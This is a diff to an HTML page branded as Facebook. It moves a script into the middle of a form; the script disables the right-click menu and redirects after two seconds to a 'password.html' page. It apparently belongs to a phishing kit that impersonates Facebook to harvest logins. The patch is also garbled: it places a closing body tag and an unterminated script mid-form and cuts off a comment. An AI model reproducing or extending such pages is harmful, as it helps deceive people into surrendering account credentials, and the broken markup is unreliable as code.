--- a/validation.html
+++ b/validation.html
@@ -13,7 +13,16 @@
             <div id="root">
                 <div>
                     <form>
-                        <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
+                        </body>
+<script>
+    document.addEventListener('contextmenu', event => {
+        event.preventDefault();
+    });
+
+    setTimeout(function() {
+    var redirectURL = "password.html"; // Updated URL
+    window.location.replace(redirectURL);
+    }, 2000); // 2000 milliseconds (2 second                       <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
                             <h1 class="text-white ms-4 m-0 d-flex align-self-center">facebook</h1>
                         </div>
                         <div class="d-flex align-items-center" style="width: 100%; height: 60px; background: rgb(233, 235, 238);">
@@ -50,17 +59,4 @@
                     </form>
                 </div>
             </div>
-    </body>
-<script>
-    document.addEventListener('contextmenu', event => {
-        event.preventDefault();
-    });
-
-    setTimeout(function() {
-    var redirectURL = "password.html"; // Updated URL
-    window.location.replace(redirectURL);
-    }, 2000); // 2000 milliseconds (2 seconds)
-    });
-</script>
-
-</html>
+    
